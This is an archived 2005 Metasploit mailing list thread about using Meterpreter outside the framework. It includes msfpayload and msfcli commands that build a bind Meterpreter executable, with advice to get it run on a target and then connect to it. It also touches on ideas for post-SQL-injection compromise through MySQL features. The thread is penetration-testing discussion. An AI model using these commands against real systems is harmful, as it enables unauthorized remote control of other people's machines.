Metasploit mailing list archives

using Meterpreter, out of MSF


From: elite_netbios at yahoo.com (Hamid . K)
Date: Wed, 26 Oct 2005 03:03:33 -0700 (PDT)

Hi,

Thank you both for the answers, but I guess something is wrong here with me, or the method HDM mentioned:

$ ./msfpayload win32_bind_meterpreter LPORT=4321 X
Warning: Multistage payloads only return first stage
...

As meterpreter is a staged one, I guess this error is the reason for my failed test :)
After running the generated executable file, no port is opened, nor can the meterpreter client connect to the box.

I'll keep trying ...

regards
Hamid.

--- H D Moore <hdm at metasploit.com> wrote:

On Tuesday 25 October 2005 19:07, Hamid . K wrote:
I was curious, if anyone tried to load meterpreter library, out of framework?

The easy way:
$ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe

Copy this executable to the target system and find some way to execute it.
After executing it, you can use the "payload_handler" exploit to connect and interact with it:
$ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 \
  RHOST=<target_system> E

Alternatively, you can use the source code in ./src and just build your own client/server implementation using it.

Second;
Is the idea of adding an automated sql-injection module to MSF.

The problem there is that version 2.x is exploit-driven - if you can't use one of the standard payloads or accomplish a very specific task, then it means writing a whole library around post-sql-injection remote compromise. Adding a mysql module means creating payloads for uploading files or executing commands via the mysql stored procedures (load data infile, the UDF stuff that abuses blank passwords, etc). If someone came up with some plausible/useful payloads that would work with generic SQL injection, I would definitely be interested in integrating it. Version 3.x is going to include "recon" modules, so a generic table enumeration module would fit into it much better than 2.x.

-HD




        
                